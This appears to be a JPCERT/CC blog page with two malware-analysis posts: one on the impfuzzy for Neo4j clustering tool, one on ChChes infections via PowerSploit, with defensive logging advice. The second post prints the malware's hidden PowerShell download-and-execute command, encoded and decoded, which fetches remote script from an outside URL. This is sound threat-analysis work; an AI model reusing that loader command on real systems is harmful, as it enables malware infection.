« February 2017 | Main

2 posts from March 2017

Mar 23, 2017

Malware Clustering using impfuzzy and Network Analysis - impfuzzy for Neo4j -

Hi again, this is Shusei Tomonaga from the Analysis Center.

This entry introduces a malware clustering tool “impfuzzy for Neo4j” developed by JPCERT/CC.

Overview of impfuzzy for Neo4j

impfuzzy for Neo4j is a tool to visualise results of malware clustering using a graph database, Neo4j. A graph database is a database for handling data structure comprised of records (nodes) and relations among the records. Neo4j provides functions to visualise registered nodes and relations in a graph.

impfuzzy for Neo4j operates in the following sequence:

  1. Calculate the similarity of malware using impfuzzy
  2. Generate a graph (network) based on the similarity
  3. Conduct network analysis over the graph (clustering)
  4. Register and visualise the clustering results on Neo4j database

First, the tool calculates the similarity of malware using impfuzzy; the techniques to estimate the similarity of Windows executables based on a hash value generated from Import API. impfuzzy was introduced in our blog article before, so please take a look for further details.

After that, a graph is generated by connecting nodes that were judged to be similar based on the impfuzzy results. The graph is then analysed using Louvain method [1]. This is one of the methods to cluster network graphs, which outperforms other algorithms in speed. With this analysis, malware is automatically classified into groups.

Finally, the information of analysed malware and its group is registered in Neo4j database.

Figure 1 describes the clustering result of Emdivi malware using impfuzzy for Neo4j.

Figure 1: Clustering result of Emdivi by impfuzzy for Neo4j

In this graph, types of malware (pink nodes) that are judged to be similar are connected with lines. From the above visualisation, it is clear that there are several groups of their variants with high similarity.

Since impfuzzy for Neo4j automatically clusters related samples through network analysis, it is possible to extract samples that belong to a specific group. Figure 2 visualises the relationship of a specific group from the example in Figure 1. The numbers on the grey lines (grey edges) between samples indicate the similarity of the malware in the range from 0 to 100 (the higher the number is, the more similar the samples are).

Figure 2: Visualisation results of samples belonging to a specific group

How to obtain and use impfuzzy for Neo4j

The tool is available on GitHub. Please refer to the following webpage:

JPCERTCC/aa-tools GitHub - impfuzzy for Neo4j


Here are the instructions for using impfuzzy for Neo4j.

1. Obtain and install Neo4j community edition

Download Neo4j community edition from the following webpage and install it:


2. Download impfuzzy_for_neo4j.py

From the following webpage:


3. Install the software required for executing impfuzzy_for_neo4j.py

  • Install Python module pyimpfuzzy
$ pip install pyimpfuzzy

For more information on the install procedures, please see:


  • Install Python module py2neo v3
$ pip install py2neo

For more information on the install procedures, please see:


  • Download Python script pylouvain.py from the following webpage and save it to the same folder as impfuzzy_for_neo4j.py


4. Run Neo4j

Run Neo4j by GUI or a command line.

5. Configure a password for Neo4j in impfuzzy_for_neo4j.py

Configure the login password for Neo4j in impfuzzy_for_neo4j.py (change the {password} below).

NEO4J_PASSWORD = "{password}"

How to use impfuzzy for Neo4j

To use impfuzzy for Neo4j, use these options to specify the input of malware to cluster.

  • -f - Specify malware (a file)
  • -d - Specify a folder where malware is stored
  • -l - Specify a CSV file(*) which lists malware

(*) The format of CSV files are the following:

File name, impfuzzy hash value, MD5 hash value, SHA1 hash value, SHA256 hash value

In the following example, malware is stored in the folder ‘Emdivi’ which is passed as a parameter.

Figure 3: impfuzzy for Neo4j execution result

Clustering results are registered in Neo4j database. Visualisation is available through the web interface of Neo4j, which is accessible from the URL below (The following is an example of Neo4j installed in a local environment).


For visualising a graph of clustering results, a Cypher query (a command to operate Neo4j database) needs to be executed through the web interface. Figure 4 is an example of executing a Cypher query through the web interface.

Figure 4: Example of Cypher query execution

Cypher queries to execute are different depending on what kind of clustering results you would like to visualise. Below are the examples of Cypher queries to visualise different clustering results.

[Example 1] Visualise all clustering results (Figure 1 is the result of the following Cypher query)

$ MATCH (m:Malware) RETURN m

[Example 2] Visualise a group of samples with a specific MD5 hash value (Figure 2 is an example of the following Cypher query)

MATCH (m1:Malware) WHERE m1.md5 = "[MD5 hash value]"
MATCH (m2:Malware) WHERE m2.cluster = m1.cluster


[Example 3] Visualise all clustering results with impfuzzy similarity level over 90

$ MATCH (m:Malware)-[s:same]-() WHERE s.value > 90 RETURN m,s


Clustering large amount of malware to distinguish unknown types that needs to be analysed in a quick manner is crucial in malware analysis. We hope that impfuzzy for Neo4j will help such analysis tasks.

In a future entry, we will introduce the clustering and analysis results that we gained through this tool.

- Shusei Tomonaga

(Translated by Yukako Uchida)


[1] The Louvain method for community detection in large networks



Mar 01, 2017

Malware Leveraging PowerSploit

Hi again, this is Shusei Tomonaga from the Analysis Center.

In this article, I’d like to share some of our findings about ChChes (which we introduced in a previous article) that it leverages PowerSploit [1] – an open source tool – for infection.

Flow of ChChes Infection

The samples that JPCERT/CC confirmed this time infect machines by leveraging shortcut files. The flow of events from a victim opening the shortcut file until a machine is infected is illustrated in Figure 1.

Figure 1: Flow of events from opening a shortcut file to ChChes infection

When the shortcut file is opened, a file containing PowerShell script is downloaded from an external server and then executed. Next, ChChes code (version 1.6.4) contained in the PowerShell script is injected into powershell.exe and executed. The detailed behaviour in each phase is described below.

Behaviour after the shortcut file is opened

When the shortcut file is opened, the following PowerShell script contained in the file is executed.

powershell.exe -nop -w hidden -exec bypass  -enc JAAyAD0AJwAtAG4Abw ~omitted~

The PowerShell script after “-enc” is encoded. Below is the decoded script:

$2='-nop -w hidden -exec bypass -c "IEX (New-Object System.Net.Webclient).DownloadString(''https://goo.gl/cpT1NW'')"';if([IntPtr]::Size -eq 8){$3 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $3 $2";}else{iex "& powershell $2";}

By executing the above PowerShell script, a file containing PowerShell script is downloaded from a specified URL. The downloaded script is loaded in 32-bit powershell.exe (syswow64\WindowsPowerShell\v1.0\powershell) and executed. The reason why it is executed in 32-bit is considered to be that ChChes’s assembly code contained in the PowerShell script is not compatible with 64-bit environment.


Details of the Downloaded PowerShell Script

The downloaded PowerShell script is partially copied from PowerSploit (Invoke-Shellcode.ps1). PowerSploit is a tool to execute files and commands on a remote host and is used for penetration tests.

When the downloaded PowerShell script is executed, it creates document files based on data contained in the script, store the files in the %TEMP% folder and displays them.  We’ve seen different types of documents shown, including Excel and World documents.


Next, ChChes code contained in the PowerShell is injected into powershell.exe. The injected ChChes receives commands and modules from C2 servers as explained in the previous blog post. The PowerShell script and the injected ChChes are not saved as files in the infected machines, and ChChes itself only exists in the memory.

Figure 2 is a part of the PowerShell script.

Figure 2: Downloaded PowerShell script

Confirming Attack Traces through Event Logs

In environments where PowerShell v5.0 is installed (including Windows 10), the PowerShell script downloaded from remote servers are recorded in the event logs under the default settings (as Figure 3). When you investigate, please check if your logs contain such records.

Figure 3: Contents recorded in Event Logs

Such logs can also be obtained in PowerShell v4.0 (Default version of Windows 8.1) by enabling the following Group Policy.

  • Computer Configuration -> Administrative Templates -> Windows Components -> Windows PowerShell -> Turn on PowerShell Script Block Logging


It is now quite common that PowerShell script is leveraged for attacks. If your event log configuration is not set to record PowerShell execution, it is recommended that you revise the settings in preparation for such attacks. Also, if you are not using PowerShell, it is suggested to restrict the execution by using AppLocker, etc.

-Shusei Tomonaga

(Translated by Yukako Uchida)


[1] PowerSploit


Appendix A: SHA-256 Hash Values of the samples


  • 4ff6a97d06e2e843755be8697f3324be36e1ebeb280bb45724962ce4b6710297
  • 75ef6ea0265d2629c920a6a1c0d1dd91d3c0eda86445c7d67ebb9b30e35a2a9f
  • ae0dd5df608f581bbc075a88c48eedeb7ac566ff750e0a1baa7718379941db86
  • 646f837a9a5efbbdde474411bb48977bff37abfefaa4d04f9fb2a05a23c6d543
  • 3d5e3648653d74e2274bb531d1724a03c2c9941fdf14b8881143f0e34fe50f03
  • 9fbd69da93fbe0e8f57df3161db0b932d01b6593da86222fabef2be31899156d
  • 723983883fc336cb575875e4e3ff0f19bcf05a2250a44fb7c2395e564ad35d48
  • f45b183ef9404166173185b75f2f49f26b2e44b8b81c7caf6b1fc430f373b50b
  • 471b7edbd3b344d3e9f18fe61535de6077ea9fd8aa694221529a2ff86b06e856
  • aef976b95a8d0f0fdcfe1db73d5e0ace2c748627c1da645be711d15797c5df38
  • dbefa21d3391683d7cc29487e9cd065be188da228180ab501c34f0e3ec2d7dfc